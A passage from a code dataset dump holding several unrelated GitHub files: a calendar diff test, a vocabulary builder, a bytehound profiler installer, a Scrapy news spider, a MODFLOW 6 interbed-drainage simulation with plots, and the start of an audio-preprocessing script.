'ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;',\n ' RSVP=TRUE;LANGUAGE=en:MAILTO:alice@hacker.com',\n 'END:VEVENT',\n 'END:VCALENDAR'])\n new = cal.Calendar(create_email(data_new))\n\n (changed, removed, added, unchanged) = old.diff(new)\n\n self.assertEqual(len(unchanged), 0)\n self.assertEqual(len(removed), 0)\n self.assertEqual(len(added), 0)\n self.assertEqual(changed.keys()[0], 'changed-event-uid')\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"cbosdo/groupwise-ics","sub_path":"test-cal.py","file_name":"test-cal.py","file_ext":"py","file_size_in_byte":16306,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"5496593270","text":"import sys\nfrom pathlib import Path\n# To import upper level 
modules\nsys.path.append(str(Path('.').absolute().parent))\nfrom data_utils.vocabulary import Vocabulary\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--text_file', type=str, required=True)\nparser.add_argument('--model_file', type=str, required=True)\nparser.add_argument('--model_type', type=str, default=\"word\")\nparser.add_argument('--vocab_size', type=int, default=500000)\n\ndef main(opt):\n\n vocab = Vocabulary(opt.vocab_size)\n vocab.create_vocabulary_from_file(sp_text_file=opt.text_file, model_filename=opt.model_file, model_type=opt.model_type) \n\n# python3 extract_token_vocab.py --data_path ../../datasets/OJ_raw_small/ --node_token_vocab_model_prefix OJ_raw_token\n\nif __name__ == \"__main__\":\n opt = parser.parse_args()\n main(opt)\n","repo_name":"bdqnghi/infercode","sub_path":"infercode/script/build_vocab_from_file.py","file_name":"build_vocab_from_file.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":84,"dataset":"github-code","pt":"32"} +{"seq_id":"27574512719","text":"\n\nfrom machineconfig.utils.utils import get_latest_release\nimport crocodile.toolbox as tb\nfrom crocodile.meta import Terminal\nfrom typing import Optional\n\n\nurl = r\"https://github.com/koute/bytehound\"\nfname = r\"bytehound-x86_64-unknown-linux-gnu.tgz\"\n__doc__ = \"\"\"Inspecting the memory usage of a running process\"\"\"\n\n\ndef main(version: Optional[str] = None):\n release = get_latest_release(url, version=version)\n if not isinstance(release, tb.P): raise ValueError(f\"Failed to get latest release. Expected a Path object, got {release}\")\n downloaded = tb.P(release).joinpath(fname).download().ungz_untar(inplace=True)\n Terminal().run(f\"sudo mv {downloaded}/* /usr/local/bin/\").print_if_unsuccessful(desc=\"MOVING executable to /usr/local/bin\", strict_err=True, strict_returncode=True)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"thisismygitrepo/machineconfig","sub_path":"src/machineconfig/jobs/python_linux_installers/dev/bytehound.py","file_name":"bytehound.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"458072626","text":"#!/usr/ bin/python\n# -*- coding: utf-8 -*-\n\nimport datetime\n\nimport scrapy\n\nimport locale\nimport datetime\n\n\nlocale.setlocale(locale.LC_ALL, \"es_AR.utf8\")\n\nBASE_URL = 'http://www.lacapitalmdp.com/'\n\nclass LaCapitalMdpSpider(scrapy.Spider):\n name = \"lacapitalmdp\"\n\n def start_requests(self):\n \n urls = [\n 'http://www.lacapitalmdp.com/categorias/el-pais/',\n 'http://www.lacapitalmdp.com/categorias/la-ciudad/'\n ]\n for url in urls:\n yield scrapy.Request(url=url, callback=self.parse_seccion)\n\n\n def parse_seccion(self, response):\n noticias = set(response.xpath('//div[@class=\"col-xs-12 col-sm-9 col-md-7 col-lg-7 posts_list\"]/div[@class=\"category_nota\"]/h2/a/@href').extract())\n \n for noticia in noticias:\n nota = response.urljoin(noticia)\n yield scrapy.Request(url=nota, callback=self.parse_noticia)\n\n\n def parse_noticia(self, response):\n \n try:\n fecha_texto = response.xpath('//div[@class=\"date_container\"]/text()').extract()[0].strip()\n noticia_fecha = datetime.datetime.strptime(fecha_texto, '%d de %B de %Y')\n except:\n noticia_fecha = datetime.datetime.now()\n \n try:\n noticia_teaser = response.xpath('//div[@class=\"bajada\"]/p/text()').extract()[0].strip()\n except:\n noticia_teaser = ''\n\n noticia_cuerpo = ' '.join([e for e in 
response.xpath('//div[@class=\"nota_content\"]/p//text()').extract()])\n\n data = {\n 'titulo': response.xpath('//div[@class=\"col-xs-12 col-sm-9 col-md-6 col-lg-7\"]/h1/text()').extract()[0].strip(),\n 'fecha': noticia_fecha,\n 'noticia_texto': noticia_teaser + ' ' + noticia_cuerpo,\n 'noticia_url': response.url,\n 'source': 'La Capital Mar del Plata',\n 'formato': 'web'\n }\n \n yield data\n \n \n","repo_name":"chequeado/chequeabot","sub_path":"news_collector/news_collector/spiders/lacapitalmdp.py","file_name":"lacapitalmdp.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"es","doc_type":"code","stars":12,"dataset":"github-code","pt":"32"} +{"seq_id":"26745788369","text":"# ## Delay interbed drainage example\n#\n# This problem simulates the drainage of a thick interbed caused by a step\n# decrease in hydraulic head in the aquifer and is based on MODFLOW-2000 subsidence\n# package sample problem 1.\n\n# ### Initial setup\n#\n# Import dependencies, define the example name and workspace, and read settings from environment variables.\n\n# +\nimport os\nimport pathlib as pl\n\nimport flopy\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom flopy.plot.styles import styles\nfrom modflow_devtools.misc import get_env, timed\n\n# Example name and base workspace\nsim_name = \"ex-gwf-csub-p02\"\nworkspace = pl.Path(\"../examples\")\n\n# Settings from environment variables\nwrite = get_env(\"WRITE\", True)\nrun = get_env(\"RUN\", True)\nplot = get_env(\"PLOT\", True)\nplot_show = get_env(\"PLOT_SHOW\", True)\nplot_save = get_env(\"PLOT_SAVE\", True)\n\n# ### Define parameters\n#\n# Define model units, parameters and other settings.\n\n# +\n# Scenario-specific parameters\nparameters = {\n \"ex-gwf-csub-p02a\": {\n \"head_based\": True,\n \"bed_thickness\": (1.0,),\n \"kv\": (2.5e-06,),\n \"ndelaycells\": 19,\n },\n \"ex-gwf-csub-p02b\": {\n \"head_based\": False,\n \"bed_thickness\": (1.0,),\n \"kv\": (2.5e-06,),\n \"ndelaycells\": 19,\n },\n \"ex-gwf-csub-p02c\": {\n \"head_based\": True,\n \"bed_thickness\": (1.0, 2.0, 5.0, 10.0, 20.0, 50.0, 100.0),\n \"kv\": (2.5e-06, 1e-05, 6.25e-05, 0.00025, 0.001, 0.00625, 0.025),\n \"ndelaycells\": 1001,\n },\n}\n\n# Model units\nlength_units = \"meters\"\ntime_units = \"days\"\n\n# Model parameters\nnper = 1 # Number of periods\nnlay = 1 # Number of layers\nncol = 3 # Number of columns\nnrow = 1 # Number of rows\ndelr = 1.0 # Column width ($m$)\ndelc = 1.0 # Row width ($m$)\ntop = 0.0 # Top of the model ($ft$)\nbotm = -1000.0 # Layer bottom elevations ($m$)\nstrt = 0.0 # Starting head ($m$)\nicelltype = 0 # Cell conversion type\nk11 = 1.0e6 # Horizontal hydraulic conductivity ($m/d$)\nsgm = 1.7 # Specific gravity of moist soils (unitless)\nsgs = 2.0 # Specific gravity of saturated soils (unitless)\ntau0 = 1000.0 # Interbed drainage time constant (unitless)\ncg_theta = 0.2 # Coarse-grained material porosity (unitless)\nske = 1.0e-5 # Elastic specific storage ($1/m$)\nskv = 1.0e-2 # Inelastic specific storage ($1/m$)\ntheta = 0.45 # Interbed porosity (unitless)\nh0 = 1.0 # Initial interbed head ($m$)\nhead_offset = 1.0 # Initial preconsolidation head ($m$)\n\n# Time discretization\ntdis_ds = ((1000.0, 100, 1.05),)\n\n# Constant head cells\nc6 = []\nfor j in range(0, ncol, 2):\n c6.append([0, 0, j, strt])\n\n# Solver parameters\nnouter = 1000\nninner = 300\nhclose = 1e-9\nrclose = 1e-6\nlinaccel = \"bicgstab\"\nrelax = 0.97\n# -\n\n# ### Model setup\n#\n# Define functions to build models, write input 
files, and run the simulation.\n\n\n# +\ndef build_models(\n name,\n subdir_name=\".\",\n head_based=True,\n bed_thickness=1.0,\n kv=2e-6,\n ndelaycells=19,\n):\n sim_ws = os.path.join(workspace, name)\n if subdir_name is not None:\n sim_ws = os.path.join(sim_ws, subdir_name)\n sim = flopy.mf6.MFSimulation(sim_name=name, sim_ws=sim_ws, exe_name=\"mf6\")\n flopy.mf6.ModflowTdis(sim, nper=nper, perioddata=tdis_ds, time_units=time_units)\n flopy.mf6.ModflowIms(\n sim,\n outer_maximum=nouter,\n outer_dvclose=hclose,\n linear_acceleration=linaccel,\n inner_maximum=ninner,\n inner_dvclose=hclose,\n relaxation_factor=relax,\n rcloserecord=f\"{rclose} strict\",\n )\n gwf = flopy.mf6.ModflowGwf(\n sim, modelname=name, save_flows=True, newtonoptions=\"newton\"\n )\n flopy.mf6.ModflowGwfdis(\n gwf,\n length_units=length_units,\n nlay=nlay,\n nrow=nrow,\n ncol=ncol,\n delr=delr,\n delc=delc,\n top=top,\n botm=botm,\n )\n # gwf obs\n flopy.mf6.ModflowUtlobs(\n gwf,\n digits=10,\n print_input=True,\n continuous={\"gwf_obs.csv\": [(\"h1_1_2\", \"HEAD\", (0, 0, 1))]},\n )\n\n flopy.mf6.ModflowGwfic(gwf, strt=strt)\n flopy.mf6.ModflowGwfnpf(\n gwf,\n icelltype=icelltype,\n k=k11,\n save_specific_discharge=True,\n )\n flopy.mf6.ModflowGwfsto(gwf, iconvert=icelltype, ss=0.0, sy=0, transient={0: True})\n if head_based:\n hb_bool = True\n pc0 = head_offset\n tsgm = None\n tsgs = None\n else:\n hb_bool = None\n pc0 = -head_offset\n tsgm = sgm\n tsgs = sgs\n sub6 = [\n [\n 0,\n 0,\n 0,\n 1,\n \"delay\",\n pc0,\n bed_thickness,\n 1.0,\n skv,\n ske,\n theta,\n kv,\n h0,\n \"ib1\",\n ]\n ]\n csub = flopy.mf6.ModflowGwfcsub(\n gwf,\n print_input=True,\n save_flows=True,\n head_based=hb_bool,\n ndelaycells=ndelaycells,\n boundnames=True,\n ninterbeds=1,\n sgm=tsgm,\n sgs=tsgs,\n cg_theta=cg_theta,\n cg_ske_cr=0.0,\n beta=0.0,\n packagedata=sub6,\n )\n opth = f\"{name}.csub.obs\"\n csub_csv = opth + \".csv\"\n obs = [\n (\"tcomp\", \"interbed-compaction\", \"ib1\"),\n (\"sk\", \"sk\", \"ib1\"),\n (\"qtop\", \"delay-flowtop\", (0,)),\n (\"qbot\", \"delay-flowbot\", (0,)),\n ]\n for k in range(ndelaycells):\n tag = f\"H{k + 1:04d}\"\n obs.append((tag, \"delay-head\", (0,), (k,)))\n if not head_based:\n iposm = int(ndelaycells / 2) + 1\n iposb = ndelaycells - 1\n obs += [\n (\"est\", \"delay-estress\", (0,), (0,)),\n (\"esm\", \"delay-estress\", (0,), (iposm,)),\n (\"esb\", \"delay-estress\", (0,), (iposb,)),\n (\"gs\", \"gstress-cell\", (0, 0, 1)),\n (\"es\", \"estress-cell\", (0, 0, 1)),\n ]\n orecarray = {csub_csv: obs}\n csub.obs.initialize(\n filename=opth, digits=10, print_input=True, continuous=orecarray\n )\n\n flopy.mf6.ModflowGwfchd(gwf, stress_period_data={0: c6})\n\n flopy.mf6.ModflowGwfoc(\n gwf,\n printrecord=[(\"BUDGET\", \"ALL\")],\n )\n return sim\n\n\ndef write_models(sim, silent=True):\n sim.write_simulation(silent=silent)\n\n\n@timed\ndef run_models(sim, silent=True):\n success, buff = sim.run_simulation(silent=silent)\n assert success, buff\n\n\n# -\n\n# ### Plotting results\n#\n# Define functions to plot model results, beginning with an analytical solution to superimpose over the simulated solution.\n\n\n# +\ndef analytical_solution(z, t, dh=1.0, b0=1.0, ssk=100.0, vk=0.025, n=100, silent=True):\n v = 0.0\n e = np.exp(1)\n pi = np.pi\n pi2 = np.pi**2\n # calculate infinite sum\n for k in range(n):\n fk = float(k)\n tauk = (0.5 * b0) ** 2.0 * ssk / ((2.0 * fk + 1.0) ** 2.0 * vk)\n ep = ((2.0 * fk + 1.0) ** 2 * pi2 * vk * t) / (4.0 * ssk * (0.5 * b0) ** 2.0)\n rad = (2.0 * fk + 1.0) * pi * z / b0\n v 
+= ((-1.0) ** fk / (2.0 * fk + 1.0)) * (e**-ep) * np.cos(rad)\n if not silent:\n print(f\"{k:5d} {tauk:20g} {rad:20g} {v:20g}\")\n return dh - 4.0 * dh * v / pi\n\n\n# Set figure properties specific to the problem\nfigure_size = (6.8, 3.4)\narrow_props = dict(facecolor=\"black\", arrowstyle=\"-\", lw=0.5)\n\n\ndef plot_grid(sim, silent=True):\n with styles.USGSMap() as fs:\n name = sim.name\n gwf = sim.get_model(name)\n\n fig, ax = plt.subplots(figsize=(6.8, 2.0))\n mc = flopy.plot.PlotCrossSection(model=gwf, line={\"Row\": 0}, ax=ax)\n\n ax.fill_between([0, 1], y1=0, y2=botm, color=\"cyan\", alpha=0.5)\n styles.add_text(\n ax=ax,\n text=\"Constant head\",\n x=0.5,\n y=-500.0,\n bold=False,\n italic=False,\n transform=False,\n va=\"center\",\n ha=\"center\",\n fontsize=9,\n )\n ax.fill_between([2, 3], y1=0, y2=botm, color=\"cyan\", alpha=0.5)\n styles.add_text(\n ax=ax,\n text=\"Constant head\",\n x=2.5,\n y=-500.0,\n bold=False,\n italic=False,\n transform=False,\n va=\"center\",\n ha=\"center\",\n fontsize=9,\n )\n ax.fill_between([1, 2], y1=-499.5, y2=-500.5, color=\"brown\", alpha=0.5)\n styles.add_annotation(\n ax=ax,\n text=\"Delay interbed\",\n xy=(1.5, -510.0),\n xytext=(1.6, -300),\n bold=False,\n italic=False,\n fontsize=9,\n ha=\"center\",\n va=\"center\",\n zorder=100,\n arrowprops=arrow_props,\n )\n mc.plot_grid(color=\"0.5\", lw=0.5, zorder=100)\n\n ax.set_xlim(0, 3)\n ax.set_ylabel(\"Elevation, in meters\")\n ax.set_xlabel(\"x-coordinate, in meters\")\n styles.remove_edge_ticks(ax)\n\n plt.tight_layout()\n\n if plot_show:\n plt.show()\n if plot_save:\n fpth = os.path.join(\"..\", \"figures\", f\"{sim_name}-grid.png\")\n if not silent:\n print(f\"saving...'{fpth}'\")\n fig.savefig(fpth)\n\n\ndef plot_head_based(sim, silent=True):\n with styles.USGSPlot() as fs:\n name = sim.name\n\n # get csub observations\n ws = sim.simulation_data.mfpath.get_sim_path()\n s = flopy.mf6.MFSimulation().load(sim_ws=ws, verbosity_level=0)\n gwf = s.get_model(name)\n cobs = gwf.csub.output.obs().data\n\n # calculate the compaction analytically\n ac = []\n nz = 100\n thick = parameters[name][\"bed_thickness\"][0]\n kv = parameters[name][\"kv\"][0]\n dhalf = thick * 0.5\n az = np.linspace(-dhalf, dhalf, num=nz)\n dz = az[1] - az[0]\n for tt in cobs[\"totim\"]:\n c = 0.0\n for jdx, zz in enumerate(az):\n f = 1.0\n if jdx == 0 or jdx == nz - 1:\n f = 0.5\n h = analytical_solution(zz, tt, ssk=skv, vk=kv, n=200, dh=1.0)\n c += h * skv * f * dz\n ac.append(c)\n ac = np.array(ac)\n\n # calculate normalized simulation time\n tpct = cobs[\"totim\"] * 100 / tau0\n\n # plot the results\n fig = plt.figure(figsize=figure_size)\n gs = mpl.gridspec.GridSpec(1, 2, figure=fig)\n\n idx = 0\n ax = fig.add_subplot(gs[idx])\n ax.plot(\n tpct,\n 100 * ac / skv,\n marker=\".\",\n lw=0,\n ms=3,\n color=\"red\",\n label=\"Analytical\",\n )\n ax.plot(\n tpct,\n 100 * cobs[\"TCOMP\"] / skv,\n label=\"Simulated\",\n color=\"black\",\n lw=1,\n zorder=100,\n )\n leg = styles.graph_legend(ax, loc=\"lower right\")\n ax.set_xticks(np.arange(0, 110, 10))\n ax.set_yticks(np.arange(0, 110, 10))\n ax.set_xlabel(\"Percent of time constant\")\n ax.set_ylabel(\"Compaction, in percent of ultimate value\")\n ax.set_xlim(0, 100)\n ax.set_ylim(0, 100)\n styles.heading(ax, letter=\"A\")\n styles.remove_edge_ticks(ax)\n\n idx += 1\n ax = fig.add_subplot(gs[idx])\n ax.plot(tpct, 100 * (ac - cobs[\"TCOMP\"]) / skv, lw=1, ls=\":\", color=\"black\")\n ax.set_xticks(np.arange(0, 110, 10))\n ax.set_yticks(np.arange(0, 2.2, 0.2))\n 
ax.set_xlabel(\"Percent of time constant\")\n ax.set_ylabel(\n \"Analytical minus simulated subsidence,\\nin percent of ultimate value\"\n )\n ax.set_xlim(0, 100)\n ax.set_ylim(0, 2)\n styles.heading(ax, letter=\"B\")\n styles.remove_edge_ticks(ax)\n\n plt.tight_layout()\n\n if plot_show:\n plt.show()\n if plot_save:\n fpth = os.path.join(\"..\", \"figures\", f\"{name}-01.png\")\n if not silent:\n print(f\"saving...'{fpth}'\")\n fig.savefig(fpth)\n\n\ndef plot_effstress(sim, silent=True):\n verbose = not silent\n with styles.USGSPlot() as fs:\n name = sim.name\n\n # get effective stress csub observations\n gwf = sim.get_model(name)\n cobs = gwf.csub.output.obs().data\n\n # get head-based csub observations\n name0 = name.replace(\"-p02b\", \"-p02a\")\n ws0 = os.path.join(workspace, name0)\n sim0 = flopy.mf6.MFSimulation().load(sim_ws=ws0, verbosity_level=0)\n gwf0 = sim0.get_model(name0)\n cobs0 = gwf0.csub.output.obs().data\n\n # calculate normalized simulation time\n tpct = cobs[\"totim\"] * 100 / tau0\n\n # plot the results\n fig = plt.figure(figsize=figure_size)\n gs = mpl.gridspec.GridSpec(1, 2, figure=fig)\n\n idx = 0\n ax = fig.add_subplot(gs[idx])\n ax.plot(\n tpct,\n 100 * cobs0[\"TCOMP\"] / skv,\n lw=0,\n marker=\".\",\n ms=3,\n color=\"#238A8DFF\",\n label=\"Head-based\",\n )\n ax.plot(\n tpct,\n 100 * cobs[\"TCOMP\"] / skv,\n lw=0.75,\n label=\"Effective stress-based\",\n color=\"black\",\n zorder=100,\n )\n leg = styles.graph_legend(ax, loc=\"lower right\")\n ax.set_xticks(np.arange(0, 110, 10))\n ax.set_yticks(np.arange(0, 110, 10))\n ax.set_xlabel(\"Percent of time constant\")\n ax.set_ylabel(\"Compaction, in percent of ultimate value\")\n ax.set_xlim(0, 100)\n ax.set_ylim(0, 100)\n styles.heading(ax, letter=\"A\")\n styles.remove_edge_ticks(ax)\n\n idx += 1\n ax = fig.add_subplot(gs[idx])\n ax.plot(\n tpct,\n 100 * (cobs0[\"TCOMP\"] - cobs[\"TCOMP\"]) / skv,\n lw=1,\n ls=\":\",\n color=\"black\",\n )\n ax.set_xticks(np.arange(0, 110, 10))\n ax.set_xlabel(\"Percent of time constant\")\n ax.set_ylabel(\n \"Head-based minus effective stress-based\\nsubsidence, in percent of ultimate value\"\n )\n ax.set_xlim(0, 100)\n styles.heading(ax, letter=\"B\")\n styles.remove_edge_ticks(ax)\n\n plt.tight_layout()\n\n if plot_show:\n plt.show()\n if plot_save:\n fpth = os.path.join(\"..\", \"figures\", f\"{name}-01.png\")\n if not silent:\n print(f\"saving...'{fpth}'\")\n fig.savefig(fpth)\n\n\ndef get_subdirs(sim):\n \"\"\"Get subdirectory names\"\"\"\n name = sim.name\n # get the subdirectory names\n pth = os.path.join(workspace, name)\n hb_dirs = [\n name\n for name in sorted(os.listdir(pth))\n if os.path.isdir(os.path.join(pth, name)) and name.startswith(\"hb-\")\n ]\n es_dirs = [\n name\n for name in sorted(os.listdir(pth))\n if os.path.isdir(os.path.join(pth, name)) and name.startswith(\"es-\")\n ]\n return hb_dirs, es_dirs\n\n\ndef fill_heads(rec_arr, ndcells):\n \"\"\"Process interbed heads\"\"\"\n arr = np.zeros((rec_arr.shape[0], ndcells), dtype=float)\n for i in range(100):\n for j in range(ndcells):\n name = f\"H{j + 1:04d}\"\n arr[i, j] = rec_arr[name][i]\n return arr\n\n\ndef plot_comp_q_comparison(sim, silent=True):\n \"\"\"Plot the results for multiple interbed thicknesses\"\"\"\n with styles.USGSPlot():\n name = sim.name\n thicknesses = parameters[name][\"bed_thickness\"]\n\n # get the subdirectory names\n hb_dirs, es_dirs = get_subdirs(sim)\n\n # setup the figure\n fig = plt.figure(figsize=figure_size)\n gs = mpl.gridspec.GridSpec(1, 2, figure=fig)\n\n # set color\n cmap 
= plt.get_cmap(\"viridis\")\n cNorm = mpl.colors.Normalize(vmin=0, vmax=6)\n scalarMap = mpl.cm.ScalarMappable(norm=cNorm, cmap=cmap)\n\n axes = []\n for idx in range(2):\n ax = fig.add_subplot(gs[idx])\n if idx == 0:\n ax.set_yticks(np.arange(-0.40, 0.1, 0.05))\n ax.set_ylim(-0.40, 0)\n ax.set_xlim(0, 100)\n ylabel = (\n \"Head-based minus effective stress-based\\nsubsidence, \"\n + \"in % of ultimate value\"\n )\n else:\n ax.set_ylim(0, 8)\n ax.set_xlim(0, 100)\n ylabel = (\n \"Top minus bottom interbed effective stress-\\nbased \"\n + \"rate, in % of head-based drainage rate\"\n )\n ax.set_xlabel(\"Percent of time constant\")\n ax.set_ylabel(ylabel)\n styles.heading(ax, letter=chr(ord(\"A\") + idx))\n axes.append(ax)\n plt.subplots_adjust(wspace=0.36)\n\n for idx, (hb_dir, es_dir) in enumerate(zip(hb_dirs, es_dirs)):\n sim_ws = os.path.join(workspace, name, hb_dir)\n s = flopy.mf6.MFSimulation().load(sim_ws=sim_ws, verbosity_level=0)\n g = s.get_model(name)\n hb_obs = g.csub.output.obs().data\n\n ws0 = os.path.join(workspace, name, es_dir)\n s0 = flopy.mf6.MFSimulation().load(sim_ws=ws0, verbosity_level=0)\n g0 = s0.get_model(name)\n es_obs = g0.csub.output.obs().data\n\n # calculate normalized simulation time\n tpct = hb_obs[\"totim\"] * 100 / tau0\n\n thickness = thicknesses[idx]\n if idx == 0:\n color = \"black\"\n else:\n color = scalarMap.to_rgba(idx - 1)\n label = f\"Thickness = {int(thickness):>3d} m\"\n\n v = 100.0 * (hb_obs[\"TCOMP\"] - es_obs[\"TCOMP\"]) / (skv * thickness)\n ax = axes[0]\n ax.plot(tpct, v, color=color, lw=0.75, label=label)\n\n denom = hb_obs[\"QTOP\"] + hb_obs[\"QBOT\"]\n v = 100 * (es_obs[\"QTOP\"] - es_obs[\"QBOT\"]) / denom\n ax = axes[1]\n ax.plot(tpct, v, color=color, lw=0.75, label=label)\n\n # legend\n ax = axes[-1]\n leg = styles.graph_legend(ax, loc=\"upper right\")\n\n if plot_show:\n plt.show()\n if plot_save:\n fpth = os.path.join(\"..\", \"figures\", f\"{name}-01.png\")\n if not silent:\n print(f\"saving...'{fpth}'\")\n fig.savefig(fpth)\n\n\ndef plot_head_comparison(sim, silent=True):\n \"\"\"Plot the interbed head results for multiple interbed thicknesses\"\"\"\n with styles.USGSPlot():\n name = sim.name\n ndcells = parameters[name][\"ndelaycells\"]\n thicknesses = parameters[name][\"bed_thickness\"]\n\n # get the subdirectory names\n hb_dirs, es_dirs = get_subdirs(sim)\n\n # setup the figure\n fig = plt.figure(figsize=figure_size)\n fig.subplots_adjust(left=0.06, right=0.95, top=0.95, bottom=0.15, wspace=0.1)\n gs = mpl.gridspec.GridSpec(1, 6, figure=fig)\n z = np.linspace(0, 1, ndcells)\n yticks = np.arange(0, 1.1, 0.1)\n\n # set color\n cmap = plt.get_cmap(\"viridis\")\n cNorm = mpl.colors.Normalize(vmin=0, vmax=6)\n scalarMap = mpl.cm.ScalarMappable(norm=cNorm, cmap=cmap)\n\n # percentages to evaluate\n pct_vals = (\n 1,\n 5,\n 10,\n 50,\n 100,\n )\n\n axes = []\n for idx in range(6):\n ax = fig.add_subplot(gs[idx])\n ax.set_ylim(1, 0)\n ax.set_xlim(-5, 5)\n if idx < 5:\n styles.heading(ax, letter=chr(ord(\"A\") + idx))\n ax.set_yticks(yticks)\n styles.remove_edge_ticks(ax)\n text = r\"$\\frac{t}{\\tau_0}$ = \" + \"{}\".format(pct_vals[idx] / 100.0)\n ax.text(\n 0.25,\n 0.01,\n text,\n ha=\"center\",\n va=\"bottom\",\n transform=ax.transAxes,\n fontsize=8,\n )\n else:\n ax.set_xticks([])\n ax.set_yticks([])\n\n if idx == 0:\n ax.set_ylabel(\"Interbed position, relative to interbed thickness\")\n else:\n if idx == 2:\n text = (\n \"Difference in head-based and effective stress-based\"\n + \"\\ninterbed heads, in percent of head-based 
interbed heads\"\n )\n ax.set_xlabel(text)\n ax.set_yticklabels([])\n axes.append(ax)\n\n for idx, (hb_dir, es_dir) in enumerate(zip(hb_dirs, es_dirs)):\n sim_ws = os.path.join(workspace, name, hb_dir)\n s = flopy.mf6.MFSimulation().load(sim_ws=sim_ws, verbosity_level=0)\n g = s.get_model(name)\n hb_obs = g.csub.output.obs().data\n hb_arr = fill_heads(hb_obs, ndcells)\n\n ws0 = os.path.join(workspace, name, es_dir)\n s0 = flopy.mf6.MFSimulation().load(sim_ws=ws0, verbosity_level=0)\n g0 = s0.get_model(name)\n es_obs = g0.csub.output.obs().data\n es_arr = fill_heads(es_obs, ndcells)\n #\n # pth = os.path.join(ws, name, hb_dir, \"{}.csub.obs.csv\".format(name))\n # hb_obs = np.genfromtxt(pth, names=True, delimiter=\",\")\n # hb_arr = fill_heads(hb_obs, ndcells)\n #\n # pth = os.path.join(ws, name, es_dir, \"{}.csub.obs.csv\".format(name))\n # es_obs = np.genfromtxt(pth, names=True, delimiter=\",\")\n # es_arr = fill_heads(es_obs, ndcells)\n\n # calculate normalized simulation time\n tpct = hb_obs[\"totim\"] * 100 / tau0\n\n # calculate location closest to 1, 5, 10, 50, and 100 percent of time constant\n locs = {}\n for i in pct_vals:\n for jdx, t in enumerate(tpct):\n if t <= i:\n locs[i] = jdx\n\n for jdx, (key, ivalue) in enumerate(locs.items()):\n # add data to the subplot\n ax = axes[jdx]\n if idx == 0:\n color = \"black\"\n else:\n color = scalarMap.to_rgba(idx - 1)\n hhb = hb_arr[ivalue, :]\n hes = es_arr[ivalue, :]\n v = 100.0 * (hhb - hes) / hhb\n ax.plot(v, z, lw=0.75, color=color)\n\n # legend\n ax = axes[-1]\n ax.set_ylim(1, 0)\n ax.set_xlim(-5, 5)\n ax.spines[\"top\"].set_color(\"none\")\n ax.spines[\"bottom\"].set_color(\"none\")\n ax.spines[\"left\"].set_color(\"none\")\n ax.spines[\"right\"].set_color(\"none\")\n ax.patch.set_alpha(0.0)\n for ic, b in enumerate(thicknesses):\n if ic == 0:\n color = \"black\"\n else:\n color = scalarMap.to_rgba(ic - 1)\n label = f\"Thickness = {int(b):>3d} m\"\n ax.plot([-1, -1], [-1, -1], lw=0.75, color=color, label=label)\n\n leg = styles.graph_legend(ax, loc=\"center\", bbox_to_anchor=(0.64, 0.5))\n\n if plot_show:\n plt.show()\n if plot_save:\n fpth = os.path.join(\"..\", \"figures\", f\"{name}-02.png\")\n if not silent:\n print(f\"saving...'{fpth}'\")\n fig.savefig(fpth)\n\n\ndef plot_results(sim, silent=True):\n name = sim.name\n if name.endswith(\"a\"):\n plot_grid(sim, silent=silent)\n plot_head_based(sim, silent=silent)\n elif name.endswith(\"b\"):\n plot_effstress(sim, silent=silent)\n elif name.endswith(\"c\"):\n plot_comp_q_comparison(sim, silent=silent)\n plot_head_comparison(sim, silent=silent)\n\n\n# -\n\n# ### Running the example\n#\n# Define a function to run the example scenarios, then plot results.\n\n\n# +\ndef scenarios(idx, silent=True):\n key = list(parameters.keys())[idx]\n interbed_thickness = parameters[key][\"bed_thickness\"]\n interbed_kv = parameters[key][\"kv\"]\n params = parameters[key].copy()\n if len(interbed_thickness) == 1:\n params[\"bed_thickness\"] = interbed_thickness[0]\n params[\"kv\"] = interbed_kv[0]\n\n sim = build_models(key, **params)\n if write:\n write_models(sim, silent=silent)\n if run:\n run_models(sim, silent=silent)\n else:\n for b, kv in zip(interbed_thickness, interbed_kv):\n for head_based in (\n True,\n False,\n ):\n if head_based:\n subdir_name = \"hb-\"\n else:\n subdir_name = \"es-\"\n subdir_name += f\"{int(b):03d}\"\n params[\"head_based\"] = head_based\n params[\"bed_thickness\"] = b\n params[\"kv\"] = kv\n\n sim = build_models(key, subdir_name=subdir_name, **params)\n if write:\n 
write_models(sim, silent=silent)\n if run:\n run_models(sim, silent=silent)\n if plot:\n plot_results(sim, silent=silent)\n\n\n# -\n\n\n# Run and plot the head based solution.\n\nscenarios(0)\n\n# Run and plot the effective stress solution.\n\nscenarios(1)\n\n# Run and plot the head based for multiple interbed thicknesses.\n\nscenarios(2)\n","repo_name":"langevin-usgs/modflow6-examples","sub_path":"scripts/ex-gwf-csub-p02.py","file_name":"ex-gwf-csub-p02.py","file_ext":"py","file_size_in_byte":25126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"32658510673","text":"import os\nimport re\n\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import Dataset\nimport pandas as pd\nimport torchaudio\nimport argparse\n\nfrom tqdm import tqdm\nimport random\n\nimport librosa\nfrom librosa.core import resample\nfrom scipy.io import wavfile\n\nfrom helper.audio_cleaner import clean\n\n\ndef read_file(path):\n wav, sr = torchaudio.load(path)\n return wav, sr\n\ndef save_sample(wavetensor, rate, target_dir, fn, ix):\n fn = fn.split('.wav')[0]\n if (ix > 0):\n dst_path = os.path.join(target_dir.split('.')[0], fn+'_{}.wav'.format(str(ix)))\n else:\n dst_path = os.path.join(target_dir.split('.')[0], fn+'.wav')\n torchaudio.save(dst_path, wavetensor, rate)\n\n\ndef check_dir(path):\n if os.path.exists(path) is False:\n os.mkdir(path)\n\n\ndef save_sample_librosa(waveform, rate, target_dir, fn, ix):\n fn = fn.split('.wav')[0]\n if (ix > 0):\n dst_path = os.path.join(target_dir.split('.')[0], fn+'_{}.wav'.format(str(ix)))\n else:\n dst_path = os.path.join(target_dir.split('.')[0], 